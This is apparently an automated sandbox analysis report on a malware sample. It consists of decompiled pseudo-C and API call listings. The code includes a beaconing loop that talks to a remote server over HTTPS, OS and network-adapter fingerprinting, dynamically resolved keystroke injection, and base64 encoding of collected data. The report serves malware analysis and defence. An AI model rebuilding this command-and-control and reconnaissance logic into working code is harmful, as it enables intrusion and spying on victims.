GetStringTypeW.KERNEL32(00000001,?,00000001,?,?,?,B|$,00247060,00000000,00000008,B|$,?,?,?), ref: 0024C504

Strings

B|$, xrefs: 0024C4BF
JX%, xrefs: 0024C4E3

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Analysis Process: rundll32.exe PID: 3432 Parent PID: 3412

Execution Graph

Execution Coverage:	27.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	1344
Total number of Limit Nodes:	12

Executed Functions

Function 10004CB8, Relevance: 10.6, APIs: 7, Instructions: 120
networkfilestring

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10004CB8(void* __ecx, char* _a4, char* _a8, long _a12, char* _a16, intOrPtr* _a20) {
				void _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				char* _t30;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t41;
				long _t48;
				long _t53;
				void* _t54;
				void* _t55;
				void _t60;
				long _t65;
				void* _t67;
				long _t68;
				void* _t69;

				_t65 = 0;
				_v16 = 0;
				_v12 = 0;
				_t30 = E100051F6(__ecx);
				_t53 = 3;
				_t58 =  !=  ? _t53 : 0;
				_t31 = InternetOpenA( *(__ecx + 4),  !=  ? _t53 : 0, _t30, 0, 0); // executed
				_t67 = _t31;
				_t32 = InternetConnectA(_t67, _a4, 0x1bb, 0, 0, _t53, 0, 0); // executed
				_a4 = _t32;
				_t54 = HttpOpenRequestA(_t32, _a16, _a8, 0, 0, 0, 0x800000, 0);
				_a8 = _t54;
				E10001C7D( !=  ? _t53 : 0, _t54);
				_t36 = HttpSendRequestA(_t54, 0, 0, _a12, lstrlenA(_a12)); // executed
				_t60 = 0;
				_v8 = 0;
				if(_t36 != 0) {
					_a12 = 4;
					HttpQueryInfoA(_t54, 0x20000013,  &_v8,  &_a12, 0);
					_t60 = _v8;
				}
				_v16 = _a4;
				_v20 = _t67;
				_v12 = _t54;
				if(_t60 == 0xc8) {
					_t68 = _t65;
					_a12 = _t65;
					_t41 = E100027C7(0x10000); // executed
					_t55 = _t41;
					while(1) {
						InternetReadFile(_a8, _t55, 0x10000,  &_a12); // executed
						_t44 = _a12;
						if(_a12 == 0) {
							break;
						}
						_t48 = E1000291A(_t65, _t44 + _t68); // executed
						_t65 = _t48;
						E100030DF(_t68 + _t65, _t55, _a12);
						_t68 = _t68 + _a12;
						_t69 = _t69 + 0x14;
						if(_a12 != 0) {
							continue;
						}
						break;
					}
					 *_a20 = _t68;
					E100028FC(_t55);
				}
				E10004810( &_v20); // executed
				return _t65;
			}

0x10004cc1
0x10004cc5
0x10004cc8
0x10004ccb
0x10004cd2
0x10004cda
0x10004ce1
0x10004cf4
0x10004cf7
0x10004d09
0x10004d16
0x10004d19
0x10004d1c
0x10004d32
0x10004d38
0x10004d3a
0x10004d3f
0x10004d45
0x10004d57
0x10004d5d
0x10004d5d
0x10004d63
0x10004d66
0x10004d69
0x10004d72
0x10004d79
0x10004d7b
0x10004d7e
0x10004d84
0x10004d86
0x10004d93
0x10004d99
0x10004d9e
0x00000000
0x00000000
0x10004da4
0x10004dac
0x10004db3
0x10004db8
0x10004dbb
0x10004dc2
0x00000000
0x00000000
0x00000000
0x10004dc2
0x10004dc8
0x10004dca
0x10004dcf
0x10004dd4
0x10004de2

APIs

InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10004CE1
InternetConnectA.WININET(00000000,00000000,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 10004CF7
HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00800000,00000000), ref: 10004D10

Part of subcall function 10001C7D: InternetQueryOptionA.WININET(00000004,0000001F,?,?), ref: 10001C96
Part of subcall function 10001C7D: InternetSetOptionA.WININET(00000004,0000001F,00003180,00000004), ref: 10001CAE

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,771CC486,00000000), ref: 10004D25
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 10004D32
HttpQueryInfoA.WININET(00000000,20000013,00000000,?), ref: 10004D57
InternetReadFile.WININET(00000000,00000000,00010000,?), ref: 10004D93

Part of subcall function 100028FC: GetProcessHeap.KERNEL32(00000008,00008000,?,10002930,00008000,?,1000278D), ref: 1000290B
Part of subcall function 100028FC: HeapFree.KERNEL32(00000000,?,10002930), ref: 10002912

Part of subcall function 1000291A: GetProcessHeap.KERNEL32(00000008,00008000,00000000,?,1000278D), ref: 1000293A
Part of subcall function 1000291A: HeapReAlloc.KERNEL32(00000000,?,1000278D), ref: 10002941

Part of subcall function 10004810: InternetCloseHandle.WININET(?), ref: 10004821
Part of subcall function 10004810: InternetCloseHandle.WININET(?), ref: 10004826
Part of subcall function 10004810: InternetCloseHandle.WININET(00000000), ref: 1000482A

Part of subcall function 100027C7: GetProcessHeap.KERNEL32(00000008,00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027CF
Part of subcall function 100027C7: RtlAllocateHeap.NTDLL(00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027D6

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004383, Relevance: 6.1, APIs: 4, Instructions: 109

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10004383(void* __ecx, void* __edx, void* __eflags) {
				char _v6;
				signed int _v8;
				struct _OSVERSIONINFOA _v160;
				struct _SYSTEM_INFO _v196;
				void* _t22;
				signed int _t24;
				signed int _t26;
				int _t28;
				int _t29;
				void* _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t37;
				signed int _t38;
				signed int _t39;
				void* _t42;
				void* _t46;

				_t46 = __edx;
				E10003104( &(_v160.dwMajorVersion), 0, 0x98);
				_v160.dwOSVersionInfoSize = 0x9c;
				GetVersionExA( &_v160);
				GetSystemInfo( &_v196); // executed
				_t42 = 0;
				_t22 = _v160.dwMajorVersion - 5;
				if(_t22 == 0) {
					_t24 = _v160.dwMinorVersion;
					__eflags = _t24;
					if(_t24 == 0) {
						_t42 = 1;
						L36:
						return _t42;
					}
					_t26 = _t24 - 1;
					__eflags = _t26;
					if(_t26 == 0) {
						_t42 = 2;
						goto L36;
					}
					__eflags = _t26 != 1;
					if(_t26 != 1) {
						goto L36;
					}
					__eflags = _v6 - 1;
					if(_v6 != 1) {
						L28:
						__eflags = _v8 & 0x00008000;
						if((_v8 & 0x00008000) == 0) {
							_t28 = GetSystemMetrics(0x59);
							__eflags = _t28;
							if(_t28 != 0) {
								_t29 = GetSystemMetrics(0x59);
								__eflags = _t29;
								if(_t29 != 0) {
									_t42 = 6;
								}
							} else {
								_t42 = 5;
							}
						} else {
							_t42 = 4;
						}
						goto L36;
					}
					__eflags = _v196.dwOemId - 9;
					if(_v196.dwOemId != 9) {
						goto L28;
					}
					_t42 = 3;
					goto L36;
				}
				_t30 = _t22 - 1;
				if(_t30 == 0) {
					__eflags = _v6 - 1;
					_t31 = _v160.dwMinorVersion;
					if(_v6 != 1) {
						_t32 = _t31;
						__eflags = _t32;
						if(_t32 == 0) {
							_t42 = 0xb;
						} else {
							_t33 = _t32 - 1;
							__eflags = _t33;
							if(_t33 == 0) {
								_t42 = 0xc;
							} else {
								_t34 = _t33 - 1;
								__eflags = _t34;
								if(_t34 == 0) {
									_t42 = 0xd;
								} else {
									__eflags = _t34 == 1;
									if(_t34 == 1) {
										_t42 = 0xe;
									}
								}
							}
						}
						goto L36;
					}
					_t36 = _t31;
					__eflags = _t36;
					if(_t36 == 0) {
						_t42 = 7;
						goto L36;
					}
					_t37 = _t36 - 1;
					__eflags = _t37;
					if(_t37 == 0) {
						_t42 = 8;
						goto L36;
					}
					_t38 = _t37 - 1;
					__eflags = _t38;
					if(__eflags == 0) {
						_t42 = 9;
						_t39 = E10004085(0, _t46, __eflags, 6, 3, 0);
						__eflags = _t39;
						if(_t39 == 0) {
							goto L36;
						}
						L11:
						_t42 = 0xa;
						goto L36;
					}
					__eflags = _t38 != 1;
					if(_t38 != 1) {
						goto L36;
					} else {
						goto L11;
					}
				} else {
					if(_t30 == 4) {
						_t42 = (0 | _v6 == 0x00000001) + 0xf;
					}
					goto L36;
				}
			}

0x10004383
0x1000439b
0x100043a3
0x100043b4
0x100043c1
0x100043cf
0x100043d1
0x100043d4
0x1000446e
0x1000446e
0x10004470
0x100044c1
0x100044c3
0x100044c9
0x100044c9
0x10004472
0x10004472
0x10004475
0x100044bd
0x00000000
0x100044bd
0x10004477
0x1000447a
0x00000000
0x00000000
0x1000447c
0x10004480
0x10004490
0x10004490
0x10004497
0x1000449f
0x100044a5
0x100044a7
0x100044af
0x100044b5
0x100044b7
0x100044b9
0x100044b9
0x100044a9
0x100044a9
0x100044a9
0x10004499
0x10004499
0x10004499
0x00000000
0x10004497
0x10004482
0x1000448a
0x00000000
0x00000000
0x1000448c
0x00000000
0x1000448c
0x100043da
0x100043dd
0x100043f7
0x100043fb
0x10004401
0x10004445
0x10004445
0x10004447
0x10004464
0x10004449
0x10004449
0x10004449
0x1000444c
0x10004460
0x1000444e
0x1000444e
0x1000444e
0x10004451
0x1000445c
0x10004453
0x10004453
0x10004456
0x10004458
0x10004458
0x10004456
0x10004451
0x1000444c
0x00000000
0x10004447
0x10004403
0x10004403
0x10004405
0x10004441
0x00000000
0x10004441
0x10004407
0x10004407
0x1000440a
0x1000443a
0x00000000
0x1000443a
0x1000440c
0x1000440c
0x1000440f
0x10004421
0x10004423
0x1000442b
0x1000442d
0x00000000
0x00000000
0x10004433
0x10004433
0x00000000
0x10004433
0x10004411
0x10004414
0x00000000
0x1000441a
0x00000000
0x1000441a
0x100043df
0x100043e2
0x100043ef
0x100043ef
0x00000000
0x100043e2

APIs

GetVersionExA.KERNEL32(0000009C,?,?,00000000), ref: 100043B4
GetSystemInfo.KERNELBASE(?,?,?,00000000), ref: 100043C1

Part of subcall function 10004085: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,771CC486), ref: 100040E4
Part of subcall function 10004085: VerSetConditionMask.KERNEL32(00000000,?,?,?,771CC486), ref: 100040E8
Part of subcall function 10004085: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,771CC486), ref: 100040EC
Part of subcall function 10004085: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 10004115

GetSystemMetrics.USER32(00000059), ref: 1000449F
GetSystemMetrics.USER32(00000059), ref: 100044AF

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100037EA, Relevance: 6.0, APIs: 4, Instructions: 48
librarykeyboard

C-Code - Quality: 69%

			E100037EA(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				CHAR* _t5;
				_Unknown_base(*)()* _t8;
				void* _t13;
				void* _t18;
				CHAR* _t23;
				struct HINSTANCE__* _t24;

				_t13 = __ebx;
				_t5 = E10002F3F(__ecx, 0x100071d0, 0xa);
				_pop(_t18);
				_t23 = _t5;
				_t24 = GetModuleHandleA(_t23);
				if(_t24 != 0) {
					L2:
					_push(_t13);
					_t14 = E10002F3F(_t18, 0x10007238, 0xb);
					_t8 = GetProcAddress(_t24, _t7);
					if(_t8 != 0) {
						 *_t8(_a4, _a8, _a12, _a16); // executed
					}
					E10003F0A(_t14);
				} else {
					_t24 = LoadLibraryA(_t23);
					if(_t24 != 0) {
						goto L2;
					}
				}
				return E10003F0A(_t23);
			}

0x100037ea
0x100037f6
0x100037fc
0x100037fd
0x10003806
0x1000380a
0x10003819
0x10003819
0x10003828
0x1000382c
0x10003834
0x10003842
0x10003842
0x10003845
0x1000380c
0x10003813
0x10003817
0x00000000
0x00000000
0x10003817
0x10003856

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?,10004626,0000002C,00000045,00000001,00000000,00000000,00000000,00000000,100074FC,00000006,00000000,100075D0), ref: 10003800
LoadLibraryA.KERNEL32(00000000), ref: 1000380D
GetProcAddress.KERNEL32(00000000,00000000,00000001,?,10004626,0000002C,00000045,00000001,00000000,00000000,00000000,00000000,100074FC,00000006,00000000,100075D0), ref: 1000382C
keybd_event.USER32(00000000,00000000,00000000,00000001,?,10004626,0000002C,00000045,00000001,00000000,00000000,00000000,00000000,100074FC,00000006,00000000), ref: 10003842

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10002D8F, Relevance: 3.0, APIs: 2, Instructions: 31
encryption

C-Code - Quality: 70%

			E10002D8F(BYTE* _a4, int _a8) {
				int _v8;
				char* _t12;
				char* _t22;

				_v8 = _v8 & 0x00000000;
				CryptBinaryToStringA(_a4, _a8, 0x40000001, 0,  &_v8);
				_push(_v8);
				_t12 = E10003F01(); // executed
				_t22 = _t12;
				CryptBinaryToStringA(_a4, _a8, 0x40000001, _t22,  &_v8);
				return _t22;
			}

0x10002d93
0x10002dab
0x10002db1
0x10002db4
0x10002dba
0x10002dc8
0x10002dd5

APIs

CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DAB
CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DC8

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000418B, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 189
string

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E1000418B(void* __eflags) {
				signed int _v8;
				signed int _v12;
				short _v16;
				short _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				intOrPtr _t86;
				signed int _t92;
				void* _t93;
				short _t97;
				int _t104;
				short _t105;
				short _t106;
				signed int _t109;
				int _t111;
				int _t117;
				int _t118;
				intOrPtr _t120;
				intOrPtr _t121;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				signed int _t148;
				signed int _t149;
				intOrPtr _t151;
				short _t153;
				signed int _t154;
				void* _t157;
				void* _t159;

				_t148 = 0;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v12 = 0;
				L10006C5C(); // executed
				_push( ~(0 | __eflags > 0x00000000) | _v12 * 0x00000178); // executed
				_t86 = E10003F01(); // executed
				_t151 = _t86;
				_push( &_v12);
				_push(_t151);
				_push(0);
				_push(0);
				_push(0);
				_v28 = _t151;
				L10006C5C(); // executed
				_v8 = 0;
				_v24 = lstrlenW(" - ");
				_t120 = _t151;
				if(_t151 != 0) {
					do {
						_t117 = lstrlenW( *(_t120 + 0x28));
						_t118 = lstrlenW( *(_t120 + 0x24));
						_t134 =  *(_t120 + 0x34) * 3;
						_t120 =  *((intOrPtr*)(_t120 + 8));
						_t148 = _t148 + 1 + _t134 + _v24 * 2 + _t118 + _t117;
					} while (_t120 != 0);
					_t151 = _v28;
					_v8 = _t148;
					_t148 = 0;
				}
				_t139 = 2;
				_push( ~0x00BADBAD | (_v8 + 0x00000002) * _t139);
				_t92 = E10003F01();
				_t121 = _t151;
				_t132 = _t92;
				_v8 = _t132;
				if(_t151 != 0) {
					_t153 = 0x25;
					_t97 = 0x20;
					_push(0x32);
					_v16 = 0x2e;
					_v20 = 0x78;
					do {
						_t142 = 0x73;
						_v74 = _t142;
						_t143 = 0x2d;
						_v72 = _t97;
						_v68 = _t97;
						_v62 = _t97;
						_v58 = _t97;
						_v70 = _t143;
						_t144 = 0x73;
						_v52 = _v16;
						_v48 = _v20;
						_v64 = _t144;
						_t145 = 0x2d;
						_v46 = 0;
						_v60 = _t145;
						_t146 = 0x32;
						_v76 = _t153;
						_v66 = _t153;
						_v56 = _t153;
						_v54 = _t146;
						_v50 = _t146;
						_t104 = wsprintfW(_t132 + _t148 * 2,  &_v76,  *((intOrPtr*)(_t121 + 0x28)),  *((intOrPtr*)(_t121 + 0x24)),  *(_t121 + 0x2c) & 0x000000ff);
						_t159 = _t157 + 0x14;
						_t149 = _t148 + _t104;
						_v42 = _t153;
						_t154 = _v8;
						_v38 = _v16;
						_t105 = 0x3a;
						_v44 = _t105;
						_t106 = 0x32;
						_v40 = _t106;
						_v36 = _t106;
						_v34 = _v20;
						_v32 = 0;
						_t109 = 1;
						_v24 = 1;
						if( *((intOrPtr*)(_t121 + 0x34)) > 1) {
							do {
								_t149 = _t149 + wsprintfW(_t154 + _t149 * 2,  &_v44,  *(_t121 + _t109 + 0x2c) & 0x000000ff);
								_t159 = _t159 + 0xc;
								_t109 = _v24 + 1;
								_v24 = _t109;
							} while (_t109 <  *((intOrPtr*)(_t121 + 0x34)));
						}
						_t111 = wsprintfW(_t154 + _t149 * 2, 0x10007370, 0x1000736c);
						_t121 =  *((intOrPtr*)(_t121 + 8));
						_t157 = _t159 + 0xc;
						_t132 = _v8;
						_t148 = _t149 + _t111;
						_t97 = 0x20;
						_t153 = 0x25;
						_push(0x32);
					} while (_t121 != 0);
				}
				_t93 = E10002E25(_t132);
				E10003F0A(_v8);
				E10003F0A(_v28); // executed
				return _t93;
			}

0x10004194
0x10004199
0x1000419a
0x1000419b
0x1000419c
0x1000419d
0x1000419e
0x100041a1
0x100041b9
0x100041ba
0x100041c0
0x100041c5
0x100041c6
0x100041c7
0x100041c8
0x100041c9
0x100041ca
0x100041cd
0x100041d7
0x100041e0
0x100041e3
0x100041e7
0x100041e9
0x100041ec
0x100041f7
0x100041fd
0x10004207
0x1000420f
0x10004211
0x10004215
0x10004218
0x1000421b
0x1000421b
0x10004227
0x10004231
0x10004232
0x10004237
0x1000423a
0x1000423c
0x10004241
0x10004249
0x1000424c
0x1000424d
0x10004250
0x10004257
0x1000425e
0x10004260
0x10004263
0x10004267
0x1000426a
0x1000426e
0x10004272
0x10004276
0x1000427d
0x10004281
0x10004284
0x1000428b
0x10004291
0x10004295
0x10004298
0x100042a0
0x100042a4
0x100042ac
0x100042b3
0x100042bb
0x100042c0
0x100042c4
0x100042c8
0x100042d1
0x100042d4
0x100042d6
0x100042da
0x100042dd
0x100042e3
0x100042e4
0x100042ea
0x100042eb
0x100042ef
0x100042f6
0x100042fc
0x10004300
0x10004305
0x10004308
0x1000430a
0x1000431e
0x10004320
0x10004326
0x10004327
0x1000432a
0x1000430a
0x1000433d
0x10004343
0x10004346
0x10004349
0x1000434c
0x10004350
0x10004353
0x10004354
0x10004357
0x1000425e
0x10004360
0x1000436a
0x10004372
0x10004382

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,771CC486), ref: 100041A1
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,771CC486), ref: 100041CD
lstrlenW.KERNEL32( - ,00000000,00000000,00000000,00000000,771CC486,00002710,771CC486,00000000), ref: 100041DA
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000497A,00000000), ref: 100041EC
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000497A,00000000), ref: 100041F7
wsprintfW.USER32 ref: 100042C8
wsprintfW.USER32 ref: 10004318
wsprintfW.USER32 ref: 1000433D

Part of subcall function 10002E25: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,10004365,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,10004365,00000000), ref: 10002E3B
Part of subcall function 10002E25: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,10004365,000000FF,00000000,00000000,00000000,00000000,?,10004365,00000000), ref: 10002E5D

Strings

., xrefs: 10004250
- , xrefs: 100041D2
x, xrefs: 10004257

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10005AFE, Relevance: 15.4, APIs: 12, Instructions: 368
sleepstring

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E10005AFE() {
				char _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				CHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t70;
				CHAR* _t71;
				CHAR* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				char _t78;
				intOrPtr _t79;
				void* _t84;
				CHAR* _t104;
				CHAR* _t121;
				CHAR* _t129;
				intOrPtr _t131;
				CHAR* _t132;
				void* _t135;
				intOrPtr _t143;
				char _t147;
				intOrPtr _t151;
				intOrPtr _t153;
				void* _t160;
				intOrPtr _t164;
				intOrPtr _t198;
				void* _t213;
				void* _t215;
				CHAR* _t217;
				CHAR* _t221;
				intOrPtr _t224;
				char _t230;
				void* _t234;
				void* _t237;

				_t151 = _t153;
				_v20 = _t151;
				_t66 = E10005528(_t153, _t237);
				L2:
				_t238 = _t66 - 1;
				if(_t66 != 1) {
					Sleep(0x2710);
					_t66 = E10005528(_t153, __eflags);
					goto L2;
				}
				E10005416(_t151, _t238); // executed
				while(1) {
					_t68 = E1000586A(_t151, _t151, _t238);
					_t239 = _t68;
					if(_t68 != 0) {
						break;
					}
					Sleep(0x2710);
				}
				_t69 = E10004946(_t151, _t213, _t239); // executed
				_t215 = _t69;
				while(1) {
					_t70 = E100059D4(_t151, _t215); // executed
					if(_t70 != 0) {
						break;
					}
					_t71 = E100055C8(_t151);
					__eflags = _t71;
					if(_t71 != 0) {
						L10:
						Sleep(0x2710); // executed
						continue;
					}
					_t72 = E100050E9(_t151, _t215); // executed
					 *((char*)(_t151 + 0x21)) = _t72;
					__eflags = _t72;
					if(_t72 != 0) {
						continue;
					}
					Sleep(0x1b7740); // executed
					goto L10;
				}
				_t241 =  *((char*)(_t151 + 0x21));
				if( *((char*)(_t151 + 0x21)) != 0) {
					E10005920( *((intOrPtr*)(_t151 + 8)));
					E100054C3(_t151);
				}
				E10003F0A(_t215);
				_pop(_t160);
				while(1) {
					_t74 = E10005528(_t160, _t241);
					_t242 = _t74 - 1;
					if(_t74 != 1) {
						goto L15;
					}
					while(1) {
						_t161 = _t151;
						_t75 = E1000586A(_t151, _t151, _t242);
						_t243 = _t75;
						if(_t75 != 0) {
							break;
						}
						Sleep(0x2710);
					}
					_t76 = E10002F3F(_t161, 0x10007393, 1);
					_t216 = _t76;
					_v24 = _t76;
					_t77 = E10002F3F(_t161, 0x10007390, 1);
					_t234 = _t234 + 0x10;
					_v44 = _t77;
					_t78 = E10005696(_t151, _t243, _t76, _t77);
					_v12 = _v12 & 0x00000000;
					_v8 = _t78;
					 *((char*)(_t151 + 0x22)) = 0;
					while(1) {
						_t245 =  *((char*)(_t151 + 0x20));
						_push( &_v12);
						_push(_t78);
						_t164 = _t151;
						if( *((char*)(_t151 + 0x20)) == 0) {
							_t79 = E10004F4D(_t164, _t216);
							_t216 = _t79;
							_v32 = _t79;
						} else {
							_t216 = E10005012(_t164, _t245);
							_v32 = _t216;
						}
						if(_t216 != 0 ||  *((char*)(_t151 + 0x22)) != 0) {
							break;
						}
						if(E100055C8(_t151) != 0) {
							L30:
							Sleep(0x2710);
							L31:
							_t78 = _v8;
							if( *((char*)(_t151 + 0x22)) == 0) {
								continue;
							}
							break;
						}
						_t147 = E100050E9(_t151, _t216);
						 *((char*)(_t151 + 0x21)) = _t147;
						if(_t147 != 0) {
							goto L31;
						}
						Sleep(0x1b7740);
						goto L30;
					}
					if( *((char*)(_t151 + 0x21)) != 0) {
						E10005920( *((intOrPtr*)(_t151 + 8)));
						E100054C3(_t151);
					}
					E10003F0A(_v8);
					if(_t216 == 0) {
						L55:
						E10003F0A(_v44);
						E10003F0A(_v24);
						_pop(_t160);
						_push(0x1b7740);
						L16:
						Sleep();
						continue;
					} else {
						if(E10003EC9(0x18) == 0) {
							_t224 = 0;
							_v8 = 0;
						} else {
							_t143 = E10005F25(_t83, _t216, _v12);
							_t224 = _t143;
							_v8 = _t143;
						}
						while(1) {
							_t168 = _t224;
							_t84 = E1000602C(_t224);
							_t254 = _t84;
							if(_t84 == 0) {
								break;
							}
							_t217 = E10005FD4(_t224);
							__eflags = _t217;
							if(_t217 != 0) {
								E10005920(_t217);
								E10003F0A( *( *((intOrPtr*)(_t151 + 0xc)) + 4));
								_push(lstrlenA(_t217) + 1);
								 *( *((intOrPtr*)(_t151 + 0xc)) + 4) = E10003F01();
								E100030DF( *( *((intOrPtr*)(_t151 + 0xc)) + 4), _t217, lstrlenA(_t217));
								E10003F0A(_t217);
								E100059D4(_t151, E10005696(_t151, __eflags, _v24, E10002F3F( *((intOrPtr*)(_t151 + 0xc)), 0x10007391, 1)));
								E10003F0A(_t97);
								E10003F0A(_t96);
								E10003F0A( *((intOrPtr*)(_t151 + 8)));
								_t104 = lstrlenA( *( *((intOrPtr*)(_t151 + 0xc)) + 4)) + 1;
								__eflags = _t104;
								 *((intOrPtr*)(_t151 + 8)) = E10003F01();
								E100030DF( *((intOrPtr*)(_t151 + 8)),  *( *((intOrPtr*)(_t151 + 0xc)) + 4), lstrlenA( *( *((intOrPtr*)(_t151 + 0xc)) + 4)));
								_t234 = _t234 + 0x30;
								E100059D4(_t151, E10004946(_t151, _t213, __eflags));
								E10003F0A(_t110);
								_t168 = _t104;
								L52:
								E100059D4(_t151, E10005696(_t151, _t254, _v24, E10002F3F(_t168, 0x10007391, 1)));
								E10003F0A(_t114);
								E10003F0A(_t113);
								_t230 = _v8;
								_t241 = _t230;
								if(_t230 != 0) {
									E10005F54(_t230);
									E10003EE0(_t230);
								}
								E10003F0A(_v32);
								goto L55;
							}
							_t188 = _t224;
							_t121 = E10006457(_t224);
							_v28 = _t121;
							__eflags = _t121;
							if(_t121 != 0) {
								L48:
								E100059D4(_t151, E10005696(_t151, __eflags, E10002F3F(_t188, 0x1000739f, 1), _v28));
								E10003F0A(_t123);
								E10003F0A(_t122);
								E10003F0A(_v28);
								_t224 = _v8;
								_t234 = _t234 + 0xc;
								continue;
							}
							_t193 = _t224;
							_t221 = E10005FC7(_t224);
							__eflags = _t221;
							if(_t221 == 0) {
								_t188 = _t224;
								_t129 = E10006512();
								_v28 = _t129;
								__eflags = _t129;
								if(_t129 == 0) {
									continue;
								}
								goto L48;
							}
							_v40 = E10002F3F(_t193, 0x1000739e, 1);
							_t131 = E10005696(_t151, __eflags, _t130, _t221);
							_v16 = _v16 & 0x00000000;
							__eflags =  *((char*)(_t151 + 0x20));
							_push( &_v16);
							_v36 = _t131;
							_t198 = _t151;
							_push(_t131);
							if(__eflags == 0) {
								_t132 = E10004F4D(_t198, _t221);
							} else {
								_t132 = E10005012(_t198, __eflags);
							}
							_v28 = _t132;
							__eflags = _t132;
							if(_t132 != 0) {
								_t135 = E100062CD(_t224, _t132, _v16);
								E100059D4(_v20, E10005696(_v20, __eflags, E10002F3F(_t224, 0x1000739f, 1), _t135));
								E10003F0A(_t137);
								E10003F0A(_t136);
								E10003F0A(_t135);
								E10003F0A(_v28);
								_t151 = _v20;
								_t234 = _t234 + 0x10;
								_t224 = _v8;
							}
							E10003F0A(_v36);
							E10003F0A(_v40);
						}
						goto L52;
					}
					L15:
					_push(0x2710);
					goto L16;
				}
			}

0x10005b06
0x10005b09
0x10005b0c
0x10005b26
0x10005b26
0x10005b28
0x10005b1f
0x10005b21
0x00000000
0x10005b21
0x10005b2c
0x10005b36
0x10005b38
0x10005b3d
0x10005b3f
0x00000000
0x00000000
0x10005b34
0x10005b34
0x10005b43
